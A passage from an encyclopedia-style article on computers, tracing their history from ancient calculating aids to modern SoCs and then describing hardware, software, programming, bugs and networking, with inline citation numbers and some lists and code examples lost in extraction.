Babylonia as early as 2400 BCE. Since then, many other forms of reckoning boards or tables have been invented. In a medieval European counting house, a checkered cloth would be placed on a table, and markers moved around on it according to certain rules, as an aid to calculating sums of money. 5 The Antikythera mechanism is believed to be the earliest known mechanical analog computer, according to Derek J. de Solla Price. 6 It was designed to calculate astronomical positions. It was discovered in 1901 in the Antikythera wreck off the Greek island of Antikythera, between Kythera and Crete, and has been dated to approximately c. 100 BCE. Devices of comparable complexity to the Antikythera mechanism would not reappear until the fourteenth century. 7 Many mechanical aids to calculation and measurement were constructed for astronomical and navigation use. The planisphere was a star chart invented by Ab Rayh n al-B r n in the early 11th century. 8 The astrolabe was invented in the Hellenistic world in either the 1st or 2nd centuries BCE and is often attributed to Hipparchus. A combination of the planisphere and dioptra, the astrolabe was effectively an analog computer capable of working out several different kinds of problems in spherical astronomy. An astrolabe incorporating a mechanical calendar computer 9 10 and gear-wheels was invented by Abi Bakr of Isfahan, Persia in 1235. 11 Ab Rayh n al-B r n invented the first mechanical geared lunisolar calendar astrolabe, 12 an early fixed-wired knowledge processing machine 13 with a gear train and gear-wheels, 14 c. 1000 AD. The sector, a calculating instrument used for solving problems in proportion, trigonometry, multiplication and division, and for various functions, such as squares and cube roots, was developed in the late 16th century and found application in gunnery, surveying and navigation. The planimeter was a manual instrument to calculate the area of a closed figure by tracing over it with a mechanical linkage. The slide rule was invented around 1620 1630, by the English clergyman William Oughtred, shortly after the publication of the concept of the logarithm. It is a hand-operated analog computer for doing multiplication and division. As slide rule development progressed, added scales provided reciprocals, squares and square roots, cubes and cube roots, as well as transcendental functions such as logarithms and exponentials, circular and hyperbolic trigonometry and other functions. Slide rules with special scales are still used for quick performance of routine calculations, such as the E6B circular slide rule used for time and distance calculations on light aircraft. In the 1770s, Pierre Jaquet-Droz, a Swiss watchmaker, built a mechanical doll (automaton) that could write holding a quill pen. By switching the number and order of its internal wheels different letters, and hence different messages, could be produced. In effect, it could be mechanically "programmed" to read instructions. Along with two other complex machines, the doll is at the Mus e d'Art et d'Histoire of Neuch tel, Switzerland, and still operates. 15 In 1831 1835, mathematician and engineer Giovanni Plana devised a Perpetual Calendar machine, which, through a system of pulleys and cylinders and over, could predict the perpetual calendar for every year from 0 CE (that is, 1 BCE) to 4000 CE, keeping track of leap years and varying day length. The tide-predicting machine invented by the Scottish scientist Sir William Thomson in 1872 was of great utility to navigation in shallow waters. It used a system of pulleys and wires to automatically calculate predicted tide levels for a set period at a particular location. The differential analyser, a mechanical analog computer designed to solve differential equations by integration, used wheel-and-disc mechanisms to perform the integration. In 1876, Sir William Thomson had already discussed the possible construction of such calculators, but he had been stymied by the limited output torque of the ball-and-disk integrators. 16 In a differential analyzer, the output of one integrator drove the input of the next integrator, or a graphing output. The torque amplifier was the advance that allowed these machines to work. Starting in the 1920s, Vannevar Bush and others developed mechanical differential analyzers. In the 1890s, the Spanish engineer Leonardo Torres Quevedo began to develop a series of advanced analog machines that could solve real and complex roots of polynomials, 17 18 19 20 which were published in 1901 by the Paris Academy of Sciences. 21 Charles Babbage, an English mechanical engineer and polymath, originated the concept of a programmable computer. Considered the "father of the computer", 22 he conceptualized and invented the first mechanical computer in the early 19th century. After working on his difference engine he announced his invention in 1822, in a paper to the Royal Astronomical Society, titled "Note on the application of machinery to the computation of astronomical and mathematical tables", 23 he also designed to aid in navigational calculations, in 1833 he realized that a much more general design, an analytical engine, was possible. The input of programs and data was to be provided to the machine via punched cards, a method being used at the time to direct mechanical looms such as the Jacquard loom. For output, the machine would have a printer, a curve plotter and a bell. The machine would also be able to punch numbers onto cards to be read in later. The engine would incorporate an arithmetic logic unit, control flow in the form of conditional branching and loops, and integrated memory, making it the first design for a general-purpose computer that could be described in modern terms as Turing-complete. 24 25 The machine was about a century ahead of its time. All the parts for his machine had to be made by hand this was a major problem for a device with thousands of parts. Eventually, the project was dissolved with the decision of the British Government to cease funding. Babbage's failure to complete the analytical engine can be chiefly attributed to political and financial difficulties as well as his desire to develop an increasingly sophisticated computer and to move ahead faster than anyone else could follow. Nevertheless, his son, Henry Babbage, completed a simplified version of the analytical engine's computing unit (the mill) in 1888. He gave a successful demonstration of its use in computing tables in 1906. In his work Essays on Automatics published in 1914, Leonardo Torres Quevedo wrote a brief history of Babbage's efforts at constructing a mechanical Difference Engine and Analytical Engine. The paper contains a design of a machine capable to calculate formulas like a x ( y z ) 2 displaystyle a x (y-z) 2 , for a sequence of sets of values. The whole machine was to be controlled by a read-only program, which was complete with provisions for conditional branching. He also introduced the idea of floating-point arithmetic. 26 27 28 In 1920, to celebrate the 100th anniversary of the invention of the arithmometer, Torres presented in Paris the Electromechanical Arithmometer, which allowed a user to input arithmetic problems through a keyboard, and computed and printed the results, 29 30 31 32 demonstrating the feasibility of an electromechanical analytical engine. 33 During the first half of the 20th century, many scientific computing needs were met by increasingly sophisticated analog computers, which used a direct mechanical or electrical model of the problem as a basis for computation. However, these were not programmable and generally lacked the versatility and accuracy of modern digital computers. 34 The first modern analog computer was a tide-predicting machine, invented by Sir William Thomson (later to become Lord Kelvin) in 1872. The differential analyser, a mechanical analog computer designed to solve differential equations by integration using wheel-and-disc mechanisms, was conceptualized in 1876 by James Thomson, the elder brother of the more famous Sir William Thomson. 16 The art of mechanical analog computing reached its zenith with the differential analyzer, built by H. L. Hazen and Vannevar Bush at MIT starting in 1927. This built on the mechanical integrators of James Thomson and the torque amplifiers invented by H. W. Nieman. A dozen of these devices were built before their obsolescence became obvious. By the 1950s, the success of digital electronic computers had spelled the end for most analog computing machines, but analog computers remained in use during the 1950s in some specialized applications such as education (slide rule) and aircraft (control systems). By 1938, the United States Navy had developed an electromechanical analog computer small enough to use aboard a submarine. This was the Torpedo Data Computer, which used trigonometry to solve the problem of firing a torpedo at a moving target. During World War II similar devices were developed in other countries as well. Early digital computers were electromechanical; electric switches drove mechanical relays to perform the calculation. These devices had a low operating speed and were eventually superseded by much faster all-electric computers, originally using vacuum tubes. The Z2, created by German engineer Konrad Zuse in 1939 in Berlin, was one of the earliest examples of an electromechanical relay computer. 35 In 1941, Zuse followed his earlier machine up with the Z3, the world's first working electromechanical programmable, fully automatic digital computer. 38 39 The Z3 was built with 2000 relays, implementing a 22 bit word length that operated at a clock frequency of about 5 10 Hz. 40 Program code was supplied on punched film while data could be stored in 64 words of memory or supplied from the keyboard. It was quite similar to modern machines in some respects, pioneering numerous advances such as floating-point numbers. Rather than the harder-to-implement decimal system (used in Charles Babbage's earlier design), using a binary system meant that Zuse's machines were easier to build and potentially more reliable, given the technologies available at that time. 41 The Z3 was not itself a universal computer but could be extended to be Turing complete. 42 43 Zuse's next computer, the Z4, became the world's first commercial computer; after initial delay due to the Second World War, it was completed in 1950 and delivered to the ETH Zurich. 44 The computer was manufactured by Zuse's own company, Zuse KG, which was founded in 1941 as the first company with the sole purpose of developing computers in Berlin. 44 Purely electronic circuit elements soon replaced their mechanical and electromechanical equivalents, at the same time that digital calculation replaced analog. The engineer Tommy Flowers, working at the Post Office Research Station in London in the 1930s, began to explore the possible use of electronics for the telephone exchange. Experimental equipment that he built in 1934 went into operation five years later, converting a portion of the telephone exchange network into an electronic data processing system, using thousands of vacuum tubes. 34 In the US, John Vincent Atanasoff and Clifford E. Berry of Iowa State University developed and tested the Atanasoff Berry Computer (ABC) in 1942, 45 the first "automatic electronic digital computer". 46 This design was also all-electronic and used about 300 vacuum tubes, with capacitors fixed in a mechanically rotating drum for memory. 47 During World War II, the British code-breakers at Bletchley Park achieved a number of successes at breaking encrypted German military communications. The German encryption machine, Enigma, was first attacked with the help of the electro-mechanical bombes which were often run by women. 48 49 To crack the more sophisticated German Lorenz SZ 40 42 machine, used for high-level Army communications, Max Newman and his colleagues commissioned Flowers to build the Colossus. 47 He spent eleven months from early February 1943 designing and building the first Colossus. 50 After a functional test in December 1943, Colossus was shipped to Bletchley Park, where it was delivered on 18 January 1944 51 and attacked its first message on 5 February. 47 Colossus was the world's first electronic digital programmable computer. 34 It used a large number of valves (vacuum tubes). It had paper-tape input and was capable of being configured to perform a variety of boolean logical operations on its data, but it was not Turing-complete. Nine Mk II Colossi were built (The Mk I was converted to a Mk II making ten machines in total). Colossus Mark I contained 1,500 thermionic valves (tubes), but Mark II with 2,400 valves, was both five times faster and simpler to operate than Mark I, greatly speeding the decoding process. 52 53 The ENIAC 54 (Electronic Numerical Integrator and Computer) was the first electronic programmable computer built in the U.S. Although the ENIAC was similar to the Colossus, it was much faster, more flexible, and it was Turing-complete. Like the Colossus, a "program" on the ENIAC was defined by the states of its patch cables and switches, a far cry from the stored program electronic machines that came later. Once a program was written, it had to be mechanically set into the machine with manual resetting of plugs and switches. The programmers of the ENIAC were six women, often known collectively as the "ENIAC girls". 55 56 It combined the high speed of electronics with the ability to be programmed for many complex problems. It could add or subtract 5000 times a second, a thousand times faster than any other machine. It also had modules to multiply, divide, and square root. High speed memory was limited to 20 words (about 80 bytes). Built under the direction of John Mauchly and J. Presper Eckert at the University of Pennsylvania, ENIAC's development and construction lasted from 1943 to full operation at the end of 1945. The machine was huge, weighing 30 tons, using 200 kilowatts of electric power and contained over 18,000 vacuum tubes, 1,500 relays, and hundreds of thousands of resistors, capacitors, and inductors. 57 The principle of the modern computer was proposed by Alan Turing in his seminal 1936 paper, 58 On Computable Numbers. Turing proposed a simple device that he called "Universal Computing machine" and that is now known as a universal Turing machine. He proved that such a machine is capable of computing anything that is computable by executing instructions (program) stored on tape, allowing the machine to be programmable. The fundamental concept of Turing's design is the stored program, where all the instructions for computing are stored in memory. Von Neumann acknowledged that the central concept of the modern computer was due to this paper. 59 Turing machines are to this day a central object of study in theory of computation. Except for the limitations imposed by their finite memory stores, modern computers are said to be Turing-complete, which is to say, they have algorithm execution capability equivalent to a universal Turing machine. Early computing machines had fixed programs. Changing its function required the re-wiring and re-structuring of the machine. 47 With the proposal of the stored-program computer this changed. A stored-program computer includes by design an instruction set and can store in memory a set of instructions (a program) that details the computation. The theoretical basis for the stored-program computer was laid out by Alan Turing in his 1936 paper. In 1945, Turing joined the National Physical Laboratory and began work on developing an electronic stored-program digital computer. His 1945 report "Proposed Electronic Calculator" was the first specification for such a device. John von Neumann at the University of Pennsylvania also circulated his First Draft of a Report on the EDVAC in 1945. 34 The Manchester Baby was the world's first stored-program computer. It was built at the University of Manchester in England by Frederic C. Williams, Tom Kilburn and Geoff Tootill, and ran its first program on 21 June 1948. 60 It was designed as a testbed for the Williams tube, the first random-access digital storage device. 61 Although the computer was described as "small and primitive" by a 1998 retrospective, it was the first working machine to contain all of the elements essential to a modern electronic computer. 62 As soon as the Baby had demonstrated the feasibility of its design, a project began at the university to develop it into a practically useful computer, the Manchester Mark 1. The Mark 1 in turn quickly became the prototype for the Ferranti Mark 1, the world's first commercially available general-purpose computer. 63 Built by Ferranti, it was delivered to the University of Manchester in February 1951. At least seven of these later machines were delivered between 1953 and 1957, one of them to Shell labs in Amsterdam. 64 In October 1947 the directors of British catering company J. Lyons Company decided to take an active role in promoting the commercial development of computers. Lyons's LEO I computer, modelled closely on the Cambridge EDSAC of 1949, became operational in April 1951 65 and ran the world's first routine office computer job. The concept of a field-effect transistor was proposed by Julius Edgar Lilienfeld in 1925. John Bardeen and Walter Brattain, while working under William Shockley at Bell Labs, built the first working transistor, the point-contact transistor, in 1947, which was followed by Shockley's bipolar junction transistor in 1948. 66 67 From 1955 onwards, transistors replaced vacuum tubes in computer designs, giving rise to the "second generation" of computers. Compared to vacuum tubes, transistors have many advantages: they are smaller, and require less power than vacuum tubes, so give off less heat. Junction transistors were much more reliable than vacuum tubes and had longer, indefinite, service life. Transistorized computers could contain tens of thousands of binary logic circuits in a relatively compact space. However, early junction transistors were relatively bulky devices that were difficult to manufacture on a mass-production basis, which limited them to a number of specialized applications. 68 At the University of Manchester, a team under the leadership of Tom Kilburn designed and built a machine using the newly developed transistors instead of valves. 69 Their first transistorized computer and the first in the world, was operational by 1953, and a second version was completed there in April 1955. However, the machine did make use of valves to generate its 125 kHz clock waveforms and in the circuitry to read and write on its magnetic drum memory, so it was not the first completely transistorized computer. That distinction goes to the Harwell CADET of 1955, 70 built by the electronics division of the Atomic Energy Research Establishment at Harwell. 70 71 The metal oxide silicon field-effect transistor (MOSFET), also known as the MOS transistor, was invented by Mohamed M. Atalla and Dawon Kahng at Bell Labs in 1959. 72 It was the first truly compact transistor that could be miniaturized and mass-produced for a wide range of uses. 68 With its high scalability, 73 and much lower power consumption and higher density than bipolar junction transistors, 74 the MOSFET made it possible to build high-density integrated circuits. 75 76 In addition to data processing, it also enabled the practical use of MOS transistors as memory cell storage elements, leading to the development of MOS semiconductor memory, which replaced earlier magnetic-core memory in computers. The MOSFET led to the microcomputer revolution, 77 and became the driving force behind the computer revolution. 78 79 The MOSFET is the most widely used transistor in computers, 80 81 and is the fundamental building block of digital electronics. 82 The next great advance in computing power came with the advent of the integrated circuit (IC). The idea of the integrated circuit was first conceived by a radar scientist working for the Royal Radar Establishment of the Ministry of Defence, Geoffrey W.A. Dummer. Dummer presented the first public description of an integrated circuit at the Symposium on Progress in Quality Electronic Components in Washington, D.C., on 7 May 1952. 83 The first working ICs were invented by Jack Kilby at Texas Instruments and Robert Noyce at Fairchild Semiconductor. 84 Kilby recorded his initial ideas concerning the integrated circuit in July 1958, successfully demonstrating the first working integrated example on 12 September 1958. 85 In his patent application of 6 February 1959, Kilby described his new device as "a body of semiconductor material ... wherein all the components of the electronic circuit are completely integrated". 86 87 However, Kilby's invention was a hybrid integrated circuit (hybrid IC), rather than a monolithic integrated circuit (IC) chip. 88 Kilby's IC had external wire connections, which made it difficult to mass-produce. 89 Noyce also came up with his own idea of an integrated circuit half a year later than Kilby. 90 Noyce's invention was the first true monolithic IC chip. 91 89 His chip solved many practical problems that Kilby's had not. Produced at Fairchild Semiconductor, it was made of silicon, whereas Kilby's chip was made of germanium. Noyce's monolithic IC was fabricated using the planar process, developed by his colleague Jean Hoerni in early 1959. In turn, the planar process was based on Mohamed M. Atalla's work on semiconductor surface passivation by silicon dioxide in the late 1950s. 92 93 94 Modern monolithic ICs are predominantly MOS (metal oxide semiconductor) integrated circuits, built from MOSFETs (MOS transistors). 95 The earliest experimental MOS IC to be fabricated was a 16 transistor chip built by Fred Heiman and Steven Hofstein at RCA in 1962. 96 General Microelectronics later introduced the first commercial MOS IC in 1964, 97 developed by Robert Norman. 96 Following the development of the self-aligned gate (silicon-gate) MOS transistor by Robert Kerwin, Donald Klein and John Sarace at Bell Labs in 1967, the first silicon-gate MOS IC with self-aligned gates was developed by Federico Faggin at Fairchild Semiconductor in 1968. 98 The MOSFET has since become the most critical device component in modern ICs. 95 The development of the MOS integrated circuit led to the invention of the microprocessor, 99 100 and heralded an explosion in the commercial and personal use of computers. While the subject of exactly which device was the first microprocessor is contentious, partly due to lack of agreement on the exact definition of the term "microprocessor", it is largely undisputed that the first single-chip microprocessor was the Intel 4004, 101 designed and realized by Federico Faggin with his silicon-gate MOS IC technology, 99 along with Ted Hoff, Masatoshi Shima and Stanley Mazor at Intel. b 103 In the early 1970s, MOS IC technology enabled the integration of more than 10,000 transistors on a single chip. 76 System on a Chip (SoCs) are complete computers on a microchip (or chip) the size of a coin. 104 They may or may not have integrated RAM and flash memory. If not integrated, the RAM is usually placed directly above (known as Package on package) or below (on the opposite side of the circuit board) the SoC, and the flash memory is usually placed right next to the SoC, this all done to improve data transfer speeds, as the data signals do not have to travel long distances. Since ENIAC in 1945, computers have advanced enormously, with modern SoCs (Such as the Snapdragon 865) being the size of a coin while also being hundreds of thousands of times more powerful than ENIAC, integrating billions of transistors, and consuming only a few watts of power. The first mobile computers were heavy and ran from mains power. The 50 lb (23 kg) IBM 5100 was an early example. Later portables such as the Osborne 1 and Compaq Portable were considerably lighter but still needed to be plugged in. The first laptops, such as the Grid Compass, removed this requirement by incorporating batteries and with the continued miniaturization of computing resources and advancements in portable battery life, portable computers grew in popularity in the 2000s. 105 The same developments allowed manufacturers to integrate computing resources into cellular mobile phones by the early 2000s. These smartphones and tablets run on a variety of operating systems and recently became the dominant computing device on the market. 106 These are powered by System on a Chip (SoCs), which are complete computers on a microchip the size of a coin. 104 Computers can be classified in a number of different ways, including: The term hardware covers all of those parts of a computer that are tangible physical objects. Circuits, computer chips, graphic cards, sound cards, memory (RAM), motherboard, displays, power supplies, cables, keyboards, printers and "mice" input devices are all hardware. A general-purpose computer has four main components: the arithmetic logic unit (ALU), the control unit, the memory, and the input and output devices (collectively termed I O). These parts are interconnected by buses, often made of groups of wires. Inside each of these parts are thousands to trillions of small electrical circuits which can be turned off or on by means of an electronic switch. Each circuit represents a bit (binary digit) of information so that when the circuit is on it represents a "1", and when off it represents a "0" (in positive logic representation). The circuits are arranged in logic gates so that one or more of the circuits may control the state of one or more of the other circuits. When unprocessed data is sent to the computer with the help of input devices, the data is processed and sent to output devices. The input devices may be hand-operated or automated. The act of processing is mainly regulated by the CPU. Some examples of input devices are: The means through which computer gives output are known as output devices. Some examples of output devices are: The control unit (often called a control system or central controller) manages the computer's various components; it reads and interprets (decodes) the program instructions, transforming them into control signals that activate other parts of the computer. d Control systems in advanced computers may change the order of execution of some instructions to improve performance. A key component common to all CPUs is the program counter, a special memory cell (a register) that keeps track of which location in memory the next instruction is to be read from. e The control system's function is as follows— this is a simplified description, and some of these steps may be performed concurrently or in a different order depending on the type of CPU: Since the program counter is (conceptually) just another set of memory cells, it can be changed by calculations done in the ALU. Adding 100 to the program counter would cause the next instruction to be read from a place 100 locations further down the program. Instructions that modify the program counter are often known as "jumps" and allow for loops (instructions that are repeated by the computer) and often conditional instruction execution (both examples of control flow). The sequence of operations that the control unit goes through to process an instruction is in itself like a short computer program, and indeed, in some more complex CPU designs, there is another yet smaller computer called a microsequencer, which runs a microcode program that causes all of these events to happen. The control unit, ALU, and registers are collectively known as a central processing unit (CPU). Early CPUs were composed of many separate components. Since the 1970s, CPUs have typically been constructed on a single MOS integrated circuit chip called a microprocessor. The ALU is capable of performing two classes of operations: arithmetic and logic. 111 The set of arithmetic operations that a particular ALU supports may be limited to addition and subtraction, or might include multiplication, division, trigonometry functions such as sine, cosine, etc., and square roots. Some can operate only on whole numbers (integers) while others use floating point to represent real numbers, albeit with limited precision. However, any computer that is capable of performing just the simplest operations can be programmed to break down the more complex operations into simple steps that it can perform. Therefore, any computer can be programmed to perform any arithmetic operation—although it will take more time to do so if its ALU does not directly support the operation. An ALU may also compare numbers and return Boolean truth values (true or false) depending on whether one is equal to, greater than or less than the other ("is 64 greater than 65? ). Logic operations involve Boolean logic: AND, OR, XOR, and NOT. These can be useful for creating complicated conditional statements and processing Boolean logic. Superscalar computers may contain multiple ALUs, allowing them to process several instructions simultaneously. 112 Graphics processors and computers with SIMD and MIMD features often contain ALUs that can perform arithmetic on vectors and matrices. A computer's memory can be viewed as a list of cells into which numbers can be placed or read. Each cell has a numbered "address" and can store a single number. The computer can be instructed to "put the number 123 into the cell numbered 1357" or to "add the number that is in cell 1357 to the number that is in cell 2468 and put the answer into cell 1595. The information stored in memory may represent practically anything. Letters, numbers, even computer instructions can be placed into memory with equal ease. Since the CPU does not differentiate between different types of information, it is the software's responsibility to give significance to what the memory sees as nothing but a series of numbers. In almost all modern computers, each memory cell is set up to store binary numbers in groups of eight bits (called a byte). Each byte is able to represent 256 different numbers (28 256); either from 0 to 255 or 128 to 127. To store larger numbers, several consecutive bytes may be used (typically, two, four or eight). When negative numbers are required, they are usually stored in two's complement notation. Other arrangements are possible, but are usually not seen outside of specialized applications or historical contexts. A computer can store any kind of information in memory if it can be represented numerically. Modern computers have billions or even trillions of bytes of memory. The CPU contains a special set of memory cells called registers that can be read and written to much more rapidly than the main memory area. There are typically between two and one hundred registers depending on the type of CPU. Registers are used for the most frequently needed data items to avoid having to access main memory every time data is needed. As data is constantly being worked on, reducing the need to access main memory (which is often slow compared to the ALU and control units) greatly increases the computer's speed. Computer main memory comes in two principal varieties: RAM can be read and written to anytime the CPU commands it, but ROM is preloaded with data and software that never changes, therefore the CPU can only read from it. ROM is typically used to store the computer's initial start-up instructions. In general, the contents of RAM are erased when the power to the computer is turned off, but ROM retains its data indefinitely. In a PC, the ROM contains a specialized program called the BIOS that orchestrates loading the computer's operating system from the hard disk drive into RAM whenever the computer is turned on or reset. In embedded computers, which frequently do not have disk drives, all of the required software may be stored in ROM. Software stored in ROM is often called firmware, because it is notionally more like hardware than software. Flash memory blurs the distinction between ROM and RAM, as it retains its data when turned off but is also rewritable. It is typically much slower than conventional ROM and RAM however, so its use is restricted to applications where high speed is unnecessary. f In more sophisticated computers there may be one or more RAM cache memories, which are slower than registers but faster than main memory. Generally computers with this sort of cache are designed to move frequently needed data into the cache automatically, often without the need for any intervention on the programmer's part. I O is the means by which a computer exchanges information with the outside world. 114 Devices that provide input or output to the computer are called peripherals. 115 On a typical personal computer, peripherals include input devices like the keyboard and mouse, and output devices such as the display and printer. Hard disk drives, floppy disk drives and optical disc drives serve as both input and output devices. Computer networking is another form of I O. I O devices are often complex computers in their own right, with their own CPU and memory. A graphics processing unit might contain fifty or more tiny computers that perform the calculations necessary to display 3D graphics. citation needed Modern desktop computers contain many smaller computers that assist the main CPU in performing I O. A 2016 era flat screen display contains its own computer circuitry. While a computer may be viewed as running one gigantic program stored in its main memory, in some systems it is necessary to give the appearance of running several programs simultaneously. This is achieved by multitasking i.e. having the computer switch rapidly between running each program in turn. 116 One means by which this is done is with a special signal called an interrupt, which can periodically cause the computer to stop executing instructions where it was and do something else instead. By remembering where it was executing prior to the interrupt, the computer can return to that task later. If several programs are running "at the same time". then the interrupt generator might be causing several hundred interrupts per second, causing a program switch each time. Since modern computers typically execute instructions several orders of magnitude faster than human perception, it may appear that many programs are running at the same time even though only one is ever executing in any given instant. This method of multitasking is sometimes termed "time-sharing" since each program is allocated a "slice" of time in turn. 117 Before the era of inexpensive computers, the principal use for multitasking was to allow many people to share the same computer. Seemingly, multitasking would cause a computer that is switching between several programs to run more slowly, in direct proportion to the number of programs it is running, but most programs spend much of their time waiting for slow input output devices to complete their tasks. If a program is waiting for the user to click on the mouse or press a key on the keyboard, then it will not take a "time slice" until the event it is waiting for has occurred. This frees up time for other programs to execute so that many programs may be run simultaneously without unacceptable speed loss. Some computers are designed to distribute their work across several CPUs in a multiprocessing configuration, a technique once employed in only large and powerful machines such as supercomputers, mainframe computers and servers. Multiprocessor and multi-core (multiple CPUs on a single integrated circuit) personal and laptop computers are now widely available, and are being increasingly used in lower-end markets as a result. Supercomputers in particular often have highly unique architectures that differ significantly from the basic stored-program architecture and from general-purpose computers. g They often feature thousands of CPUs, customized high-speed interconnects, and specialized computing hardware. Such designs tend to be useful for only specialized tasks due to the large scale of program organization required to use most of the available resources at once. Supercomputers usually see usage in large-scale simulation, graphics rendering, and cryptography applications, as well as with other so-called "embarrassingly parallel" tasks. Software refers to parts of the computer which do not have a material form, such as programs, data, protocols, etc. Software is that part of a computer system that consists of encoded information or computer instructions, in contrast to the physical hardware from which the system is built. Computer software includes computer programs, libraries and related non-executable data, such as online documentation or digital media. It is often divided into system software and application software. Computer hardware and software require each other and neither can be realistically used on its own. When software is stored in hardware that cannot easily be modified, such as with BIOS ROM in an IBM PC compatible computer, it is sometimes called "firmware". There are thousands of different programming languages—some intended for general purpose, others useful for only highly specialized applications. The defining feature of modern computers which distinguishes them from all other machines is that they can be programmed. That is to say that some type of instructions (the program) can be given to the computer, and it will process them. Modern computers based on the von Neumann architecture often have machine code in the form of an imperative programming language. In practical terms, a computer program may be just a few instructions or extend to many millions of instructions, as do the programs for word processors and web browsers for example. A typical modern computer can execute billions of instructions per second (gigaflops) and rarely makes a mistake over many years of operation. Large computer programs consisting of several million instructions may take teams of programmers years to write, and due to the complexity of the task almost certainly contain errors. This section applies to most common RAM machine based computers. In most cases, computer instructions are simple: add one number to another, move some data from one location to another, send a message to some external device, etc. These instructions are read from the computer's memory and are generally carried out (executed) in the order they were given. However, there are usually specialized instructions to tell the computer to jump ahead or backwards to some other place in the program and to carry on executing from there. These are called "jump" instructions (or branches). Furthermore, jump instructions may be made to happen conditionally so that different sequences of instructions may be used depending on the result of some previous calculation or some external event. Many computers directly support subroutines by providing a type of jump that "remembers" the location it jumped from and another instruction to return to the instruction following that jump instruction. Program execution might be likened to reading a book. While a person will normally read each word and line in sequence, they may at times jump back to an earlier place in the text or skip sections that are not of interest. Similarly, a computer may sometimes go back and repeat the instructions in some section of the program over and over again until some internal condition is met. This is called the flow of control within the program and it is what allows the computer to perform tasks repeatedly without human intervention. Comparatively, a person using a pocket calculator can perform a basic arithmetic operation such as adding two numbers with just a few button presses. But to add together all of the numbers from 1 to 1,000 would take thousands of button presses and a lot of time, with a near certainty of making a mistake. On the other hand, a computer may be programmed to do this with just a few simple instructions. The following example is written in the MIPS assembly language: Once told to run this program, the computer will perform the repetitive addition task without further human intervention. It will almost never make a mistake and a modern PC can complete the task in a fraction of a second. In most computers, individual instructions are stored as machine code with each instruction being given a unique number (its operation code or opcode for short). The command to add two numbers together would have one opcode; the command to multiply them would have a different opcode, and so on. The simplest computers are able to perform any of a handful of different instructions; the more complex computers have several hundred to choose from, each with a unique numerical code. Since the computer's memory is able to store numbers, it can also store the instruction codes. This leads to the important fact that entire programs (which are just lists of these instructions) can be represented as lists of numbers and can themselves be manipulated inside the computer in the same way as numeric data. The fundamental concept of storing programs in the computer's memory alongside the data they operate on is the crux of the von Neumann, or stored program, architecture. 119 120 In some cases, a computer might store some or all of its program in memory that is kept separate from the data it operates on. This is called the Harvard architecture after the Harvard Mark I computer. Modern von Neumann computers display some traits of the Harvard architecture in their designs, such as in CPU caches. While it is possible to write computer programs as long lists of numbers (machine language) and while this technique was used with many early computers, h it is extremely tedious and potentially error-prone to do so in practice, especially for complicated programs. Instead, each basic instruction can be given a short name that is indicative of its function and easy to remember a mnemonic such as ADD, SUB, MULT or JUMP. These mnemonics are collectively known as a computer's assembly language. Converting programs written in assembly language into something the computer can actually understand (machine language) is usually done by a computer program called an assembler. Programming languages provide various ways of specifying programs for computers to run. Unlike natural languages, programming languages are designed to permit no ambiguity and to be concise. They are purely written languages and are often difficult to read aloud. They are generally either translated into machine code by a compiler or an assembler before being run, or translated directly at run time by an interpreter. Sometimes programs are executed by a hybrid method of the two techniques. Machine languages and the assembly languages that represent them (collectively termed low-level programming languages) are generally unique to the particular architecture of a computer's central processing unit (CPU). For instance, an ARM architecture CPU (such as may be found in a smartphone or a hand-held videogame) cannot understand the machine language of an x86 CPU that might be in a PC. i Historically a significant number of other cpu architectures were created and saw extensive use, notably including the MOS Technology 6502 and 6510 in addition to the Zilog Z80. Although considerably easier than in machine language, writing long programs in assembly language is often difficult and is also error prone. Therefore, most practical programs are written in more abstract high-level programming languages that are able to express the needs of the programmer more conveniently (and thereby help reduce programmer error). High level languages are usually "compiled" into machine language (or sometimes into assembly language and then into machine language) using another computer program called a compiler. j High level languages are less related to the workings of the target computer than assembly language, and more related to the language and structure of the problem(s) to be solved by the final program. It is therefore often possible to use different compilers to translate the same high level language program into the machine language of many different types of computer. This is part of the means by which software like video games may be made available for different computer architectures such as personal computers and various video game consoles. Program design of small programs is relatively simple and involves the analysis of the problem, collection of inputs, using the programming constructs within languages, devising or using established procedures and algorithms, providing data for output devices and solutions to the problem as applicable. 121 As problems become larger and more complex, features such as subprograms, modules, formal documentation, and new paradigms such as object-oriented programming are encountered. 122 Large programs involving thousands of line of code and more require formal software methodologies. 123 The task of developing large software systems presents a significant intellectual challenge. 124 Producing software with an acceptably high reliability within a predictable schedule and budget has historically been difficult; 125 the academic and professional discipline of software engineering concentrates specifically on this challenge. 126 Errors in computer programs are called "bugs". They may be benign and not affect the usefulness of the program, or have only subtle effects. However, in some cases they may cause the program or the entire system to "hang", becoming unresponsive to input such as mouse clicks or keystrokes, to completely fail, or to crash. 127 Otherwise benign bugs may sometimes be harnessed for malicious intent by an unscrupulous user writing an exploit, code designed to take advantage of a bug and disrupt a computer's proper execution. Bugs are usually not the fault of the computer. Since computers merely execute the instructions they are given, bugs are nearly always the result of programmer error or an oversight made in the program's design. k Admiral Grace Hopper, an American computer scientist and developer of the first compiler, is credited for having first used the term "bugs" in computing after a dead moth was found shorting a relay in the Harvard Mark II computer in September 1947. 128 Computers have been used to coordinate information between multiple locations since the 1950s. The U.S. military's SAGE system was the first large-scale example of such a system, which led to a number of special-purpose commercial systems such as Sabre. 129 In the 1970s, computer engineers at research institutions throughout the United States began to link their computers together using telecommunications technology. The effort was funded by ARPA (now DARPA), and the computer network that resulted was called the ARPANET. 130 The technologies that made the Arpanet possible spread and evolved. In time, the network spread beyond academic and military institutions and became known as the Internet. The emergence of networking involved a redefinition of the nature and boundaries of the computer. Computer operating systems and applications were modified to include the ability to define and access the resources of other computers on the network, such as peripheral devices, stored information, and the like, as extensions of the resources of an individual computer. Initially these facilities were available primarily to people working in high-tech environments, but in the 1990s the spread of applications like e-mail and the World Wide Web, combined with the development of cheap, fast networking technologies like Ethernet and ADSL saw computer networking become almost ubiquitous. In fact, the number of computers that are networked is growing phenomenally. A very large proportion of personal computers regularly connect to the Internet to communicate and receive information. "Wireless" networking, often utilizing mobile phone networks, has meant networking is becoming increasingly ubiquitous even in mobile computing environments. A computer does not need to be electronic, nor even have a processor, nor RAM, nor even a hard disk. While popular usage of the word "computer" is synonymous with a personal electronic computer, l a typical modern definition of a computer is: "A device that computes, especially a programmable usually electronic machine that performs high-speed mathematical or logical operations or that assembles, stores, correlates, or otherwise processes information. 131 According to this definition, any device that processes information qualifies as a computer. There is active research to make non-classical computers out of many promising new types of technology, such as optical computers, DNA computers, neural computers, and quantum computers. Most computers are universal, and are able to calculate any computable function, and are limited only by their memory capacity and operating speed. However different designs of computers can give very different performance for particular problems; for example quantum computers can potentially break some modern encryption algorithms (by quantum factoring) very quickly. 